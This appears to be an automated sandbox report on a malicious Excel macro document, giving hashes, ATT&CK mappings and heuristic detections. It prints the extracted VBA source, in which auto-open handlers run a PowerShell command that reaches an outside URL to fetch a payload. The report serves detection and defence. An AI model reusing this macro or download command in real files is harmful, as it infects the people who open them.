Office (OOXML) malware analysis — malicious · a77d8f455d1a4f9a

MALICIOUS

Office (OOXML)

17.4 KB Created: 2018-06-20 14:49:07 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-02

MD5: 55ca60dc8568067ff325093708731384 SHA-1: 1d18b0590b3be6ec85da4cfb1ebb2c6476bcc077 SHA-256: a77d8f455d1a4f9ac71192c64a9f01756ae20796f0f1d80c343088f9c5ddcb9b

326 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing VBA macros that trigger on opening. The Auto_Open macro constructs and executes a PowerShell command to download a payload from the URL https://plus.cyberessentials.live/macro.php. This indicates a downloader or droppper functionality, common in initial stages of compromise.

Heuristics 9

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    exec = "powershell.exe start https://plus.cyberessentials.live/macro.php"
    Shell (exec)
End Sub

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

    Dim exec As String
    exec = "powershell.exe start https://plus.cyberessentials.live/macro.php"
    Shell (exec)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
    Auto_Open
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
    Auto_Open
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

Attribute VB_Name = "Module1"
Sub Auto_Open()
    Dim exec As String

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://plus.cyberessentials.live/macro.php In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	870 bytes
SHA-256: `aae532720a7f79030cc50ade388f412091fb8d65f8ede9c845c618210fb49e91`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Auto_Open() Dim exec As String exec = "powershell.exe start https://plus.cyberessentials.live/macro.php" Shell (exec) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	10752 bytes
SHA-256: `38fa77cf4a207035fdebc27903a672a775e07078f33d6088e4d7471cacea90ad`
Detection ClamAV: Doc.Downloader.Generic-6698421-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.